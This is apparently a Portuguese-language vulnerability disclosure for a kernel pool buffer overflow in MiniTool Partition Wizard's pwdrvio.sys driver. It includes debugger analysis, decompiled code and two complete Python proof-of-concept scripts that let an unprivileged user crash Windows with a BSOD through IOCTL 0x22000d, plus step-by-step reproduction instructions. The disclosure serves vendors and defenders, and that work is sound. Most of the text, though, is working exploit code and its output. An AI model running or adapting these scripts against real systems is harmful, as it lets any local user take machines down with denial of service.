
Data do projeto : fev. 2026 / Descoberta uma vulnerabilidade de estouro de buffer no manipulador IOCTL do driver do kernel. A vulnerabilidade permite que um atacante local sem privilégios corrompa a memória do pool do kernel, desencadeando uma falha imediata do sistema (BSOD) e negação de serviço.
Data do projeto: fev/2026 / Descoberta uma vulnerabilidade de estouro de buffer no manipulador de IOCTL do driver de kernel pwdrvio.sys. A vulnerabilidade permite que um atacante local sem privilégios corrompa a memória do pool do kernel, causando uma falha imediata do sistema (BSOD) e negação de serviço.
https://github.com/user-attachments/assets/b53fb5d1-b4d0-4bc6-ad6e-2a321a1d2101
Negação de Serviço (DoS)
Severidade: MÉDIA
Pontuação CVSS 3.1: 5.5 (DoS)
String do Vetor CVSS:
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:HEstouro de Buffer — Negação de Serviço (CVSS 5.5 - MÉDIA)
Pré-requisitos do ataque:
Resultados da exploração: DoS - Falha imediata do sistema, indisponibilidade do serviço
Data: 5 de fevereiro de 2026
Atividade: Fuzzing sistemático do driver de kernel usando fuzzer Python personalizado
Processo de descoberta:
Seleção do alvo:
pwdrvio.sys como o driver mais antigo (timestamp: 16 de junho de 2009)C:\Windows\System32\drivers\pwdrvio.sys\\.\PartitionWizardDiskAccesser\0Fuzzing inicial:
ctypes para interface com o driverWriteFile/DeviceIoControl ao dispositivo do driverAtivação do Verifier:
verifier /standard /driver pwdrvio.sys
Configuração do Verifier:
Verifier Flags: 0x001209bb
Standard Flags Enabled:
[X] Special pool
[X] Force IRQL checking
[X] Pool tracking
[X] I/O verification
[X] Deadlock detection
[X] DMA checking
[X] Security checks
[X] Miscellaneous checks
[X] DDI compliance checking
Data: 5 a 6 de fevereiro de 2026
Atividade: Estabelecimento do ambiente de depuração de kernel para análise de causa raiz
Procedimento de configuração:
Configuração da porta serial no VMware:
VMware Workstation Pro → VM Settings
├─ Add Hardware → Serial Port
├─ Connection: "Use named pipe"
├─ Path: \\.\pipe\com_1
├─ End: "This is the server"
└─ I/O Mode: "Yield CPU on poll" ✓
Configuração do SO convidado:
REM Administrator Command Prompt
bcdedit /debug on
bcdedit /dbgsettings serial debugport:1 baudrate:115200
shutdown /r /t 0
Conexão com WinDbg no host:
WinDbg → File → Attach to Kernel
├─ Port: \\.\pipe\com_1
├─ Baud Rate: 115200
├─ Pipe: ✓
└─ Reconnect: ✓
Result: "Kernel Debugger connection established."
Data: 6 de fevereiro de 2026
Atividade: Identificação da primitiva de escrita arbitrária no kernel
Etapas da análise:
Análise do módulo:
1: kd> lm m pwdrvio
start end module name
fffff805`315f0000 fffff805`315f8000 pwdrvio (Jun 16 2009)
1: kd> !drvobj pwdrvio 2
Driver object (fffff805`XXXXXXXX) is for:
\Driver\pwdrvio
DriverEntry: fffff805`315f6008
DriverUnload: fffff805`315f1060
Dispatch Routines:
[00] IRP_MJ_CREATE fffff805`315f108c
[02] IRP_MJ_CLOSE fffff805`315f12f8
[03] IRP_MJ_READ fffff805`315f16c4
[04] IRP_MJ_WRITE fffff805`315f1564 ← Target
[0e] IRP_MJ_DEVICE_CONTROL fffff805`315f1404
Descoberta da instrução vulnerável:
Definir breakpoint no manipulador de escrita:
1: kd> bp pwdrvio+0x1641
1: kd> g
Breakpoint 0 hit
pwdrvio+0x1641:
fffff805`315f1641 498943f0 mov qword ptr [r11-10h],rax
Descoberta crítica: Primitiva de escrita arbitrária identificada!
RAX) no endereço [R11-0x10]R11 é carregado do quadro de pilha: mov r11, qword ptr [rbp+0xB8h]Análise do estado dos registradores:
0: kd> r
rax=fffff805315f1364 ← Kernel code pointer
r11=ffffe60f84c38750 ← Destination address (controlled via stack)
rbp=ffffe60f84c38610 ← IRP stack frame
0: kd> dq @rbp+0xB8 L1
ffffe60f`84c386c8 ffffe60f`84c38750 ← R11 loaded from here
Data: 6 a 7 de fevereiro de 2026
Atividade: Rastreamento da vulnerabilidade de Use-After-Free até a condição de write-what-where
Cadeia de corrupção de memória:
Alocação do IRP:
0: kd> !pool @rbp
Pool page ffffe60f84c38610 region is Special pool
*ffffe60f84c38000 size: 1f0 data: ffffe60f84c38e10 (NonPaged) *Irp+
Pooltag Irp+ : I/O verifier allocated IRP packets
Relação dos buffers:
0: kd> r rsi
rsi=ffffe60f828df900 ← User buffer location
0: kd> ? @rbp - @rsi
Evaluate expression: 35823344 = 00000000`02229ef0 ← 35MB difference!
Análise: O buffer do usuário NÃO é diretamente acessível a partir do quadro RBP
RBP+0xB8 não aponta para o buffer controlado pelo usuárioCondição de Use-After-Free:
O driver mantém ponteiros pendentes na estrutura IRP:
// Ghidra decompilation (pwdrvio+0x1564)
longlong lVar1 = *(longlong *)(param_2 + 0xb8); // Load from IRP
// No validation!
lVar5 = IoBuildAsynchronousFsdRequest(...);
// Write to [lVar1 - 0x10]
*(code **)(lVar3 + -0x10) = FUN_00011364; // Arbitrary write!
Data: 8 de fevereiro de 2026
Atividade: Descoberta da vulnerabilidade autônoma de DoS
Descoberta:
Fuzzing de IOCTL:
0x22000d como vulnerávelMecanismo da falha:
# Vulnerable parameters
TARGET_IOCTL = 0x22000d
input_buf = (ctypes.c_char * 1024)(*([0xFF] * 1024))
real_output_buffer = ctypes.create_string_buffer(4)
fake_output_length = 8192 # Driver trusts this value!
DeviceIoControl(handle, TARGET_IOCTL, input_buf, 1024,
real_output_buffer, fake_output_length, ...)
Comportamento do driver:
Saída do Verifier:
DRIVER_VERIFIER_DETECTED_VIOLATION (c4)
Arg1: 0000000000000091, Corrupted pool allocation
Arg2: fffff805315f1404, Driver code address
Arg3: ffffe60f84c38000, Pool allocation address
Arg4: 0000000000000091, Corruption type
PROCESS_NAME: python.exe
Local: Manipulador de IOCTL do pwdrvio.sys
IOCTL vulnerável: 0x22000d
Mecanismo de acionamento:
import ctypes
from ctypes import wintypes
DEVICE_NAME = r"\\.\PartitionWizardDiskAccesser\0"
TARGET_IOCTL = 0x22000d
kernel32 = ctypes.windll.kernel32
# Open driver
handle = kernel32.CreateFileW(DEVICE_NAME, 0xC0000000, 3, None, 3, 0, None)
# Malicious parameters
input_buf = (ctypes.c_char * 1024)(*([0xFF] * 1024))
real_output_buffer = ctypes.create_string_buffer(4) # Only 4 bytes!
fake_output_length = 8192 # Claim 8192 bytes!
bytes_returned = wintypes.DWORD(0)
# Trigger overflow
kernel32.DeviceIoControl(handle, TARGET_IOCTL,
input_buf, 1024,
real_output_buffer, fake_output_length, # ← Overflow!
ctypes.byref(bytes_returned), None)
Comportamento da falha:
Com o Driver Verifier ativado:
DRIVER_VERIFIER_DETECTED_VIOLATION (c4)
Arguments:
Arg1: 0000000000000091 - Corrupted pool allocation detected
Arg2: fffff805315f1404 - Driver code address (IOCTL handler)
Arg3: ffffe60f84c38000 - Pool allocation address
Arg4: 0000000000000091 - Special pool pattern corrupted
Analysis:
- Driver attempts to write 8192 bytes to 4-byte buffer
- Pool header corruption detected by verifier
- Immediate bugcheck (BSOD)
Process triggering crash: python.exe (standard user)
Sem o Driver Verifier:
SYSTEM_SERVICE_EXCEPTION (3b)
Arguments:
Arg1: 00000000c0000005 - Access violation
Arg2: fffff805315f1404 - Faulting address in pwdrvio.sys
Arg3: ffffXXXXXXXXXXXX - Trap frame
Arg4: 0000000000000000
Result: Blue Screen of Death
Código:
import ctypes
from ctypes import wintypes
# --- Settings ---
DEVICE_NAME = r"\\.\PartitionWizardDiskAccesser\0"
kernel32 = ctypes.windll.kernel32
# --- Defines ---
# Windows API Defines
kernel32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD, wintypes.DWORD,
wintypes.LPVOID, wintypes.DWORD, wintypes.DWORD, wintypes.HANDLE]
kernel32.CreateFileW.restype = wintypes.HANDLE
kernel32.DeviceIoControl.argtypes = [wintypes.HANDLE, wintypes.DWORD, wintypes.LPVOID, wintypes.DWORD,
wintypes.LPVOID, wintypes.DWORD, ctypes.POINTER(wintypes.DWORD), wintypes.LPVOID]
kernel32.DeviceIoControl.restype = wintypes.BOOL
def trigger_bsod():
print("[!] MiniTool DoS...")
# 1. Connect Driver
handle = kernel32.CreateFileW(DEVICE_NAME, 0xC0000000, 3, None, 3, 0, None)
if handle == wintypes.HANDLE(-1).value or handle is None:
print("[-] Couldnt Connect.")
return
# 2. Preperation
# IOCTL from Fuzzer
TARGET_IOCTL = 0x22000d
# Input: Fiiled 0xFF - 1024 byte (Pointer Poisoning)
in_size = 1024
input_buf = (ctypes.c_char * in_size)(*([0xFF] * in_size))
# Output Trap: Standard 4 byte, 8192 byte in Driver
real_output_buffer = ctypes.create_string_buffer(4)
fake_output_length = 8192
bytes_returned = wintypes.DWORD(0)
print("[+] Wait for BSoD...")
# 3. Loop (Pool Corruption)
while True:
kernel32.DeviceIoControl(
handle,
TARGET_IOCTL,
input_buf,
in_size,
real_output_buffer,
fake_output_length, # <--- Vulnerable Point: Driver BufferOverflow
ctypes.byref(bytes_returned),
None
)
if __name__ == "__main__":
trigger_bsod()
Exploração:
PS C:\Users\standarduser\directory> & "C:\Program Files\Python314\python.exe" .\DoS_PoC.py
Ambiente de teste:
Ferramentas necessárias:
Passo 1: Verificar a instalação do driver
C:\> sc query pwdrvio
SERVICE_NAME: pwdrvio
TYPE : 1 KERNEL_DRIVER
STATE : 4 RUNNING
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
Passo 2: Ativar o Driver Verifier (opcional, mas recomendado)
REM Administrator Command Prompt
C:\> verifier /standard /driver pwdrvio.sys
REM Verify configuration
C:\> verifier /query
Verifier Flags: 0x001209bb
Standard Flags:
[X] 0x00000001 Special pool
[X] 0x00000002 Force IRQL checking
[X] 0x00000008 Pool tracking
[X] 0x00000010 I/O verification
[X] 0x00000020 Deadlock detection
[X] 0x00000080 DMA checking
[X] 0x00000100 Security checks
[X] 0x00000800 Miscellaneous checks
[X] 0x00020000 DDI compliance checking
Driver Verification List:
MODULE: pwdrvio.sys (load: 1 / unload: 0)
REM Reboot for verifier to take effect
C:\> shutdown /r /t 0
Passo 3: Criar o script de exploração de DoS
Salve como dos_exploit.py:
import ctypes
from ctypes import wintypes
# Device path
DEVICE_NAME = r"\\.\PartitionWizardDiskAccesser\0"
kernel32 = ctypes.windll.kernel32
# Windows API definitions
kernel32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD, wintypes.DWORD,
wintypes.LPVOID, wintypes.DWORD, wintypes.DWORD,
wintypes.HANDLE]
kernel32.CreateFileW.restype = wintypes.HANDLE
kernel32.DeviceIoControl.argtypes = [wintypes.HANDLE, wintypes.DWORD, wintypes.LPVOID,
wintypes.DWORD, wintypes.LPVOID, wintypes.DWORD,
ctypes.POINTER(wintypes.DWORD), wintypes.LPVOID]
kernel32.DeviceIoControl.restype = wintypes.BOOL
def trigger_bsod():
print("[*] MiniTool pwdrvio.sys DoS Exploit")
print("[*] Triggering Blue Screen of Death...")
# Open device
handle = kernel32.CreateFileW(DEVICE_NAME, 0xC0000000, 3, None, 3, 0, None)
if handle == wintypes.HANDLE(-1).value or handle is None:
print("[-] Failed to open driver")
print("[-] Ensure MiniTool Partition Wizard is installed")
return
print("[+] Driver opened successfully")
# Vulnerable IOCTL code
TARGET_IOCTL = 0x22000d
# Input buffer: 1024 bytes of 0xFF
input_buf = (ctypes.c_char * 1024)(*([0xFF] * 1024))
# Output buffer: Only 4 bytes (but claim 8192!)
real_output_buffer = ctypes.create_string_buffer(4)
fake_output_length = 8192 # Driver trusts this value → Overflow!
bytes_returned = wintypes.DWORD(0)
print("[!] Sending malicious IOCTL...")
print("[!] System will crash in 3...2...1...")
# Trigger buffer overflow → BSOD
kernel32.DeviceIoControl(
handle,
TARGET_IOCTL,
input_buf,
1024,
real_output_buffer,
fake_output_length, # ← Vulnerability trigger
ctypes.byref(bytes_returned),
None
)
# This line will never execute
print("[*] If you see this, the exploit failed")
if __name__ == "__main__":
trigger_bsod()
Passo 4: Executar a exploração (usuário padrão)
C:\> whoami
desktop-lfkkhu2\standard_user
C:\> python dos_exploit.py
[*] MiniTool pwdrvio.sys DoS Exploit
[*] Triggering Blue Screen of Death...
[+] Driver opened successfully
[!] Sending malicious IOCTL...
[!] System will crash in 3...2...1...
[System immediately crashes with BSOD]
Resultado esperado:
Tela azul com o código de parada:
DRIVER_VERIFIER_DETECTED_VIOLATION (c4)
ou
SYSTEM_SERVICE_EXCEPTION (3b)
Verificação: A falha do sistema confirma a vulnerabilidade de DoS
MiniTool Software:
Product: MiniTool Partition Wizard
Version: 13.5
Installation Path: C:\Program Files\MiniTool Partition Wizard
Driver Path: C:\Windows\System32\drivers\pwdrvio.sys
Driver Date: June 16, 2009 (0x4A36F8D1)
Driver Size: 32,256 bytes
Ferramentas de teste:
WinDbg Version: 10.0.29507.1001 AMD64
Python Version: 3.x with ctypes
Compiler: x86_64-w64-mingw32-gcc (MinGW)
Verifier: Windows Driver Verifier (Standard flags)
Produto principal:
Detalhes do driver:
File Name: pwdrvio.sys
File Version: [Not available]
File Size: 32,256 bytes (31.5 KB)
Time Stamp: 0x4A36F8D1 (June 16, 2009, 04:43:45 UTC)
Digital Signature: [Signed by vendor]
Device Name: \\.\PartitionWizardDiskAccesser\0
Service Name: pwdrvio
Load Order: Boot Start (SERVICE_BOOT_START)
Outros produtos MiniTool que podem usar o mesmo driver:
Observação: Cada produto deve ser testado individualmente para confirmação.
Testado e confirmado como vulnerável:
Provavelmente vulnerável (não testado):
Motivo: O driver é compatível com todas as versões modernas do Windows e não contém verificações específicas de versão.
Este repositório é fornecido estritamente para fins educacionais, de pesquisa defensiva de segurança e reprodução de vulnerabilidades em ambientes laboratoriais controlados. As informações e o código de prova de conceito têm a finalidade de ajudar defensores, pesquisadores e fornecedores a entender e corrigir a vulnerabilidade relatada. O uso não autorizado ou malicioso deste código contra sistemas sem permissão explícita pode violar leis e regulamentos aplicáveis. O autor não incentiva nem tolera atividades ilegais e não assume responsabilidade por uso indevido ou danos causados por este material.
Este relatório de divulgação de vulnerabilidade é fornecido para:
Usos proibidos:
O pesquisador conduziu todos os testes em sistemas de propriedade pessoal em ambientes controlados. Nenhum acesso não autorizado a sistemas de terceiros foi realizado.
Versão do relatório: 1.0
Última atualização: 9 de fevereiro de 2026